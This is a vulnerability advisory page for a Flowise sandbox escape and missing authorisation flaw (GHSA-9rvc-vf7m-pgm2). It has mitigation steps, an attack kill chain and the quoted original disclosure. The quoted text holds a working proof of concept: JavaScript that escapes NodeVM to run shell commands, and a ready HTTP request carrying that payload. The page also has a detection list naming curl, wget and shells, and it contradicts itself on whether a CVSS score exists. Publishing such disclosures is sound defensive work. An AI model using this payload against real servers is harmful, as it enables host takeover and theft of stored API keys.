GHSA-9rvc-vf7m-pgm2 — CRITICAL

Q: Is GHSA-9rvc-vf7m-pgm2 actively exploited?

No confirmed active exploitation of GHSA-9rvc-vf7m-pgm2 has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-9rvc-vf7m-pgm2?

1. Patch immediately: upgrade flowise to 3.1.2, which adds permission gating to POST /api/v1/node-custom-function. 2. Rotate credentials: revoke and reissue all API keys and review session tokens that could have reached this endpoint. 3. Reverse proxy block: if patching is delayed, deny external access to /api/v1/node-custom-function at the WAF or reverse proxy layer. 4. Set E2B_APIKEY: if custom JS execution is a business requirement, configure the external E2B sandbox to avoid the vulnerable NodeVM fallback. 5. Detection: alert on unexpected child_process spawns (id, whoami, curl, wget, sh, bash) originating from the Flowise Node.js PID; monitor for outbound connections from the Flowise server to unexpected destinations.

Q: What systems are affected by GHSA-9rvc-vf7m-pgm2?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM orchestration platforms, Custom AI workflow pipelines, Model serving infrastructure.

Q: What is the CVSS score for GHSA-9rvc-vf7m-pgm2?

No CVSS score has been assigned yet.

CISO Take

Flowise's custom function endpoint accepts arbitrary JavaScript from any authenticated user or API key holder with no role check, and the default NodeVM sandbox can be escaped to execute system commands on the host. With a CVSS of 9.9 and a working public PoC targeting the Error constructor chain, exploitation requires nothing beyond a standard API key — a barrier any employee account or leaked credential clears. The blast radius is full host compromise: environment variable and secret theft, filesystem access, and a persistent foothold for lateral movement, all running as the Flowise server process. Upgrade to flowise 3.1.2 immediately, revoke and rotate all existing API keys, and monitor host-level child process spawning from the Node.js runtime as an interim detection control.

Sources: GitHub Advisory ATLAS

What is the risk?

Critical. CVSS 9.9 reflects a network-accessible vector, low complexity, low privileges required, no user interaction, changed scope, and high CIA impact. The NodeVM fallback is the operational default — deployments without E2B_APIKEY configured are universally exposed, and neither the .env.example nor CONTRIBUTING.md requires it for custom JS execution. A working PoC with HTTP trigger instructions is included in the advisory, reducing time-to-exploit to near zero. The 69 prior CVEs on this package signal a historically under-hardened attack surface that warrants heightened scrutiny.

Attack Kill Chain

Initial Access

Attacker authenticates with any valid Flowise API key or user session — no elevated privilege is required.

AML.T0012

Authorization Bypass

POST to /api/v1/node-custom-function succeeds because the route registers no permission middleware, accepting an arbitrary JavaScript payload.

AML.T0049

Sandbox Escape

Crafted JavaScript exploits the Error constructor chain to escape the NodeVM boundary and recover the host Function constructor, then loads child_process.

AML.T0105

Host Compromise

Attacker executes arbitrary shell commands as the Flowise process, exfiltrating AI API keys from environment variables and establishing persistence.

AML.T0050

Initial Access

Attacker authenticates with any valid Flowise API key or user session — no elevated privilege is required.

AML.T0012

Authorization Bypass

POST to /api/v1/node-custom-function succeeds because the route registers no permission middleware, accepting an arbitrary JavaScript payload.

AML.T0049

Sandbox Escape

Crafted JavaScript exploits the Error constructor chain to escape the NodeVM boundary and recover the host Function constructor, then loads child_process.

AML.T0105

Host Compromise

Attacker executes arbitrary shell commands as the Flowise process, exfiltrating AI API keys from environment variables and establishing persistence.

AML.T0050

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
flowise	npm	<= 3.1.1	`3.1.2`

Do you use flowise? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What should I do?

5 steps

Patch immediately: upgrade flowise to 3.1.2, which adds permission gating to POST /api/v1/node-custom-function.
Rotate credentials: revoke and reissue all API keys and review session tokens that could have reached this endpoint.
Reverse proxy block: if patching is delayed, deny external access to /api/v1/node-custom-function at the WAF or reverse proxy layer.
Set E2B_APIKEY: if custom JS execution is a business requirement, configure the external E2B sandbox to avoid the vulnerable NodeVM fallback.
Detection: alert on unexpected child_process spawns (id, whoami, curl, wget, sh, bash) originating from the Flowise Node.js PID; monitor for outbound connections from the Flowise server to unexpected destinations.

Classification

Code Execution Auth Bypass Agent Framework AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials AML.T0105 - Escape to Host

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.7 - AI system security

NIST AI RMF

GOVERN 2.2 - Accountability and access control for AI systems

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is GHSA-9rvc-vf7m-pgm2?

Flowise's custom function endpoint accepts arbitrary JavaScript from any authenticated user or API key holder with no role check, and the default NodeVM sandbox can be escaped to execute system commands on the host. With a CVSS of 9.9 and a working public PoC targeting the Error constructor chain, exploitation requires nothing beyond a standard API key — a barrier any employee account or leaked credential clears. The blast radius is full host compromise: environment variable and secret theft, filesystem access, and a persistent foothold for lateral movement, all running as the Flowise server process. Upgrade to flowise 3.1.2 immediately, revoke and rotate all existing API keys, and monitor host-level child process spawning from the Node.js runtime as an interim detection control.

Is GHSA-9rvc-vf7m-pgm2 actively exploited?

No confirmed active exploitation of GHSA-9rvc-vf7m-pgm2 has been reported, but organizations should still patch proactively.

How to fix GHSA-9rvc-vf7m-pgm2?

1. Patch immediately: upgrade flowise to 3.1.2, which adds permission gating to POST /api/v1/node-custom-function. 2. Rotate credentials: revoke and reissue all API keys and review session tokens that could have reached this endpoint. 3. Reverse proxy block: if patching is delayed, deny external access to /api/v1/node-custom-function at the WAF or reverse proxy layer. 4. Set E2B_APIKEY: if custom JS execution is a business requirement, configure the external E2B sandbox to avoid the vulnerable NodeVM fallback. 5. Detection: alert on unexpected child_process spawns (id, whoami, curl, wget, sh, bash) originating from the Flowise Node.js PID; monitor for outbound connections from the Flowise server to unexpected destinations.

What systems are affected by GHSA-9rvc-vf7m-pgm2?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM orchestration platforms, Custom AI workflow pipelines, Model serving infrastructure.

What is the CVSS score for GHSA-9rvc-vf7m-pgm2?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary `POST /api/v1/node-custom-function` lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the `Custom JS Function` node. When `E2B_APIKEY` is not configured — the common deployment case — Flowise executes this code inside a `NodeVM` sandbox. This sandbox can be escaped, allowing an attacker to reach the host `process` object and execute system commands via `child_process`. The result is authenticated remote code execution on the Flowise server host. CVSS v3.1: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` = **9.9 Critical**. ### Details Two distinct security boundaries are violated. **1. Missing route-level authorization** `packages/server/src/routes/node-custom-functions/index.ts` registers the endpoint with no permission middleware: ```ts router.post('/', nodesRouter.executeCustomFunction) ``` Other sensitive routes in the same codebase use explicit permission gates: ```ts // packages/server/src/routes/chatflows/index.ts router.post( '/', checkAnyPermission('chatflows:create,chatflows:update,agentflows:create,agentflows:update'), chatflowsController.saveChatflow ) ``` Global `/api/v1` authentication still applies, so this is not unauthenticated — but any valid session or API key reaches the endpoint without further restriction. **2. NodeVM sandbox escape** The endpoint forwards `body.javascriptFunction` through the following chain: ``` POST /api/v1/node-custom-function → packages/server/src/controllers/nodes/index.ts → packages/server/src/utils/executeCustomNodeFunction.ts → packages/components/nodes/utilities/CustomFunction/CustomFunction.ts executeJavaScriptCode(javascriptFunction, sandbox) → packages/components/src/utils.ts if !process.env.E2B_APIKEY → NodeVM fallback → [SINK] host process / child_process ``` `packages/components/src/utils.ts` only uses the external E2B sandbox when `E2B_APIKEY` is set. Otherwise it silently falls back to `@flowiseai/nodevm`: ```ts const shouldUseSandbox = useSandbox && process.env.E2B_APIKEY ``` Flowise explicitly frames this as a sandboxed execution path — the helper is named `createCodeExecutionSandbox`, its inline comment reads `Execute JavaScript code using either Sandbox or NodeVM`, and the NodeVM instance is configured with `eval: false`, `wasm: false`, and mocked HTTP clients. The sandbox is a real declared security boundary, not incidental isolation. These controls do not prevent escape. The payload abuses an exception path where an `Error` object escapes the NodeVM boundary. Because the error originates from the host runtime, its constructor chain resolves to the outer Node.js realm. This allows recovery of the host `Function` constructor (`e.constructor.constructor`), which can then access `process` and built-in modules such as `child_process`: ```js const FunctionCtor = e.constructor.constructor; const cp = FunctionCtor('return process.getBuiltinModule("child_process")')(); return cp.execSync('id').toString().trim(); ``` The NodeVM fallback is the practical default. `packages/server/.env.example` and `CONTRIBUTING.md` do not require `E2B_APIKEY` for custom JS execution, so most deployments are affected. ### PoC **Standalone verification** (run from the repository root with `E2B_APIKEY` unset): ```js // poc_Flowise_NodeCustomFunction_RCE_2026.js const path = require('path'); delete process.env.E2B_APIKEY; process.env.TS_NODE_COMPILER_OPTIONS = JSON.stringify({ moduleResolution: 'NodeNext' }); require(path.resolve('targets/Flowise/node_modules/ts-node/register/transpile-only')); const { nodeClass: CustomFunction } = require(path.resolve( 'targets/Flowise/packages/components/nodes/utilities/CustomFunction/CustomFunction.ts' )); const attackCode = ` async function f() { const error = new Error(); error.name = Object.create(null); return error.stack; } return await f().catch(e => { const FunctionCtor = e.constructor.constructor; const cp = FunctionCtor('return process.getBuiltinModule("child_process")')(); return cp.execSync('id').toString().trim(); }); `; (async () => { const node = new CustomFunction(); const result = await node.init( { inputs: { javascriptFunction: attackCode } }, '', { appDataSource: {}, databaseEntities: {}, workspaceId: undefined, orgId: undefined } ); console.log('[RCE OUTPUT]', result); })(); ``` Confirmed output: ``` [RCE OUTPUT] uid=501(researcher) gid=20(staff) groups=20(staff),... ``` **HTTP trigger** (requires a valid API key or session): ```http POST /api/v1/node-custom-function HTTP/1.1 Host: target:3000 Authorization: Bearer <valid-api-key> Content-Type: application/json { "javascriptFunction": "async function f(){const error=new Error();error.name=Object.create(null);return error.stack;} return await f().catch(e=>{const F=e.constructor.constructor;const cp=F('return process.getBuiltinModule(\"child_process\")')();return cp.execSync('id').toString().trim();});" } ``` ### Impact Any authenticated Flowise user or holder of a standard API key can execute arbitrary commands as the Flowise server process. This includes reading environment variables and secrets, arbitrary filesystem access, outbound network requests from the host, and a foothold for persistence or lateral movement. The NodeVM fallback is the default for any deployment without `E2B_APIKEY` configured, which covers the majority of self-hosted instances. **Recommended remediation:** 1. Add explicit permission gating to `POST /api/v1/node-custom-function` using the existing `checkPermission` middleware pattern. 2. Fail closed if `E2B_APIKEY` is absent — do not silently downgrade to NodeVM for untrusted code execution. 3. Restrict this endpoint from generic API key access.

Exploitation Scenario

An attacker with any valid Flowise API key — sourced from a low-privileged employee account, a leaked .env file, or a compromised CI/CD pipeline — sends a crafted POST to /api/v1/node-custom-function. The payload instantiates an Error object and manipulates its name property to trigger an exception that escapes the NodeVM boundary. The outer Node.js realm's constructor chain is recovered via e.constructor.constructor, which grants access to the host Function constructor. From there, child_process.execSync runs arbitrary shell commands as the Flowise server process. The attacker reads environment variables to harvest API keys for OpenAI, Anthropic, vector databases, and cloud providers, then pivots laterally to connected AI services and data stores, establishing persistence via a reverse shell or cron job.